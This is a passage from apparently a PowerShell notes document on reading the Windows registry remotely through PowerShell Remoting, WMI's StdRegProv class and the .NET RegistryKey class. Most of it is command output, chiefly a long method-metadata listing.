Migrate, Upgrade...}\n 0 1 related.desc {wave}\n 7 1 Schedule {DomainJoinDetected}\n 2 6 SeCEdit {SetupCompDebugLevel, DefaultTemplate, EnvironmentVariables, LastUsedDatabase...}\n 1 0 setup {}\n 5 7 SoftwareProtectionPlatform {VLActivationInterval, VLRenewalInterval, UserOperations, InactivityShutdownDelay...}\n 2 1 SPP {LastIndex}\n 2 5 Superfetch {ServiceFlags, ProcessorTime, PfPdData, MemMonitorState...}\n 16 25 Svchost {RPCSS, defragsvc, LocalSystemNetworkRestricted, LocalService...}\n 3 3 SystemRestore {RPSessionInterval, FirstRun, LastIndex}\n 1 0 Terminal Server {}\n 91 1 Time Zones {TzVersion}\n 3 0 Tracing {}\n 0 1 Userinstallable.drivers {wave}\n 0 0 WbemPerf {}\n 0 14 Windows {IconServiceLib, DdeSendTimeout, DesktopHeapLogging, GDIProcessHandleQuota...}\n 2 21 Winlogon {ReportBootOk, Shell, PreCreateKnownFolders, Userinit...}\n 1 22 Winsat {MOOBE, LastExitCode, LastExitCodeCantMsg, LastExitCodeWhyMsg...}\n 0 9 WinSATAPI {LastFormalAssessment, TaskErrorCount, IdleWinSATRunCount, FirstIdleRunTimeDate...}\n 6 0 WOW {}\n 1 9 WUDF {LogEnable, Logkd, LogFlags, LogLevel...}\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n- ```PowerShell Remoting```\n\n```PowerShell\nPS C:\\> Invoke-Command -ScriptBlock {Get-Item HKLM:\\SOFTWARE} -ComputerName JOHN-PC -Credential John-PC\\John\n\n Hive: HKEY_LOCAL_MACHINE\n\nName Property PSComputerName\n---- -------- --------------\nSOFTWARE JOHN-PC\n\nPS C:\\>\n```\n\n- ```WMI```\n\n```PowerShell\nPS C:\\> $RemoteReg = Get-WmiObject -List \"StdRegProv\" -ComputerName JOHN-PC -Credential John-PC\\John\n```\n\n```PowerShell\nPS C:\\> $RemoteReg\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\nStdRegProv {CreateKey, Delet... {}\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $RemoteReg | Select-Object -ExpandProperty methods\n\nName : CreateKey\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : DeleteKey\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : EnumKey\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : EnumValues\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : DeleteValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetDWORDValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetQWORDValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetDWORDValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetQWORDValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetMultiStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetMultiStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetExpandedStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetExpandedStringValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetBinaryValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : GetBinaryValue\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : CheckAccess\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, static}\n\nName : SetSecurityDescriptor\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, Privileges, static}\n\nName : GetSecurityDescriptor\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : StdRegProv\nQualifiers : {implemented, Privileges, static}\n\nPS C:\\>\n```\n\n[Hive](https://github.com/darkoperator/Posh-SecMod/blob/master/Registry/Registry.ps1) | Value\n-----|-----------\nHKCR | 2147483648\nHKCU | 2147483649\nHKLM | 2147483650\nHKUS | 2147483651\nHKCC | 2147483653\n\n```PowerShell\nPS C:\\> $RemoteReg.GetStringValue(2147483650, \"Software\\Microsoft\\Windows NT\\CurrentVersion\", \"ProductName\")\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nReturnValue : 0\nsValue : Windows 7 Ultimate\nPSComputerName :\n\nPS C:\\>\n```\n\n- ```.Net``` - ```[Microsoft.Win32.RegistryKey]```\n - [Can’t pass alternate credentials](http://psremoteregistry.codeplex.com/)\n\n```PowerShell\nPS C:\\> [Microsoft.Win32.RegistryKey].GetMethods()\n\nName : Close\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663541\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : Flush\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663543\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : Dispose\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663544\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Final, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : True\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663545\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663546\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663547\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663548\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663549\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663550\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : CreateSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663551\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : DeleteSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663553\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : DeleteSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663554\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : DeleteSubKeyTree\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663555\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : DeleteSubKeyTree\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663556\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : DeleteValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663558\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : DeleteValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663559\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : OpenBaseKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663562\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Static, HideBySig\nCallingConvention : Standard\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : True\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : OpenRemoteBaseKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663563\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Static, HideBySig\nCallingConvention : Standard\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : True\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : OpenRemoteBaseKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663564\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Static, HideBySig\nCallingConvention : Standard\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : True\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]}\n\nName : OpenSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663565\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : OpenSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663566\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : OpenSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663567\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : OpenSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663568\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], 